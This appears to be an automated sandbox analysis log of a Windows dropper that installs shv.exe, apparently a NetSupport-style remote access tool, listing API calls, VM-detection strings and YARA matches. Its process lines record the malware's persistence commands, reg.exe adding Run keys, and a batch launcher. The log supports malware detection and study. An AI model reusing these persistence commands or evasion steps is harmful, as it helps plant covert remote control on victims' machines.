Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 6_2_11065890
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 6_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 6_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 6_2_1110AFD0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 9_2_1102D330
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA, 9_2_11065890
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError, 9_2_1106A0A0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle, 9_2_111266E0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose, 9_2_1110AFD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7B16A4 VirtualQuery,GetSystemInfo, 0_2_00007FF70E7B16A4
Source: shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla m*
Source: HTCTL32.DLL.0.dr Binary or memory string: VMware
Source: HTCTL32.DLL.0.dr Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.0.dr Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: HTCTL32.DLL.0.dr Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: shv.exe, 00000006.00000002.3994135214.000000000127E000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995636739.0000000005F06000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: TCCTL32.DLL.0.dr Binary or memory string: VMWare
Source: shv.exe, 00000009.00000002.2162978734.0000000001490000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000009.00000003.2162115523.000000000148D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllH
Source: shv.exe, 0000000B.00000003.2263461175.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000D.00000003.2349439155.00000000012AF000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000E.00000003.2430757165.00000000010C0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\Public\Netstat\shv.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\shv.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF70E7B76D8
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState, 6_2_11147750
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary, 6_2_11029590
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7C0D20 GetProcessHeap, 0_2_00007FF70E7C0D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF70E7B76D8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7B3354 SetUnhandledExceptionFilter, 0_2_00007FF70E7B3354
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7B2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF70E7B2510
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7B3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF70E7B3170
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle, 6_2_11093080
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter, 6_2_110310C0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_11161D01
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_1116DD89
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_6D1E28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_6D1E28E1
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle, 9_2_11093080
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter, 9_2_110310C0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_11161D01
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1116DD89
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError, 6_2_110F4560
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF70E7AB190
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event, 6_2_1111FCA0
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent, 6_2_1109E190
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid, 6_2_1109E910
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: Shell_TrayWnd
Source: shv.exe, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: Progman
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E79DC70 cpuid 0_2_00007FF70E79DC70
Source: C:\Users\user\Desktop\file.exe Code function: GetLocaleInfoW,GetNumberFormatW, 0_2_00007FF70E7AA2CC
Source: C:\Users\Public\Netstat\shv.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 6_2_11173A35
Source: C:\Users\Public\Netstat\shv.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 6_2_11173D69
Source: C:\Users\Public\Netstat\shv.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 6_2_11173CC6
Source: C:\Users\Public\Netstat\shv.exe Code function: GetLocaleInfoA, 6_2_1116B38E
Source: C:\Users\Public\Netstat\shv.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 6_2_11173933
Source: C:\Users\Public\Netstat\shv.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 6_2_111739DA
Source: C:\Users\Public\Netstat\shv.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_1117383E
Source: C:\Users\Public\Netstat\shv.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 6_2_11173D2D
Source: C:\Users\Public\Netstat\shv.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 6_2_11173C06
Source: C:\Users\Public\Netstat\shv.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 6_2_6D1F1DB6
Source: C:\Users\Public\Netstat\shv.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 6_2_6D1FDC56
Source: C:\Users\Public\Netstat\shv.exe Code function: GetLocaleInfoA, 6_2_6D1FDC99
Source: C:\Users\Public\Netstat\shv.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 6_2_6D1F1CC1
Source: C:\Users\Public\Netstat\shv.exe Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free, 6_2_6D1F0F39
Source: C:\Users\Public\Netstat\shv.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 6_2_6D1F1E5D
Source: C:\Users\Public\Netstat\shv.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 6_2_6D1F1EB8
Source: C:\Users\Public\Netstat\shv.exe Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea, 6_2_6D1FDB7C
Source: C:\Users\Public\Netstat\shv.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s, 9_2_11173D69
Source: C:\Users\Public\Netstat\shv.exe Code function: GetLocaleInfoA, 9_2_1116B38E
Source: C:\Users\Public\Netstat\shv.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 9_2_11173933
Source: C:\Users\Public\Netstat\shv.exe Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen, 9_2_111739DA
Source: C:\Users\Public\Netstat\shv.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 9_2_1117383E
Source: C:\Users\Public\Netstat\shv.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 9_2_11173A35
Source: C:\Users\Public\Netstat\shv.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 9_2_11173D2D
Source: C:\Users\Public\Netstat\shv.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 9_2_11173C06
Source: C:\Users\Public\Netstat\shv.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 9_2_11173CC6
Source: C:\Users\Public\Netstat\shv.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree, 6_2_110F33F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7B0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF70E7B0754
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA, 6_2_1103B160
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 6_2_11174AE9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E794EB0 GetVersionExW, 0_2_00007FF70E794EB0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep, 6_2_11070090
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError, 6_2_110D8200
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_6D1CA980 EnterCriticalSection,LeaveCriticalSection,LeaveCriticalSection,LeaveCriticalSection,WSAGetLastError,socket,WSAGetLastError,#21,#21,#21,bind,WSAGetLastError,closesocket,htons,WSASetBlockingHook,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAGetLastError,WSAUnhookBlockingHook,closesocket,WSAUnhookBlockingHook,EnterCriticalSection,InitializeCriticalSection,getsockname,LeaveCriticalSection,GetTickCount,InterlockedExchange, 6_2_6D1CA980
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep, 9_2_11070090
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError, 9_2_110D8200
Source: Yara match File source: 9.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.shv.exe.70030000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.shv.exe.74a90000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.shv.exe.70030000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.shv.exe.74a90000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.0.shv.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.file.exe.229e94ad820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.shv.exe.6d1c0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.3995874203.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2164286651.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2141232902.00000229E5442000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2431878910.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2142143293.00000229E5446000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2264608455.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2431151804.00000000010A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2142077833.00000229E5444000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2351314982.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file.exe PID: 5988, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shv.exe PID: 5552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shv.exe PID: 6488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shv.exe PID: 1936, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shv.exe PID: 4000, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: shv.exe PID: 3360, type: MEMORYSTR
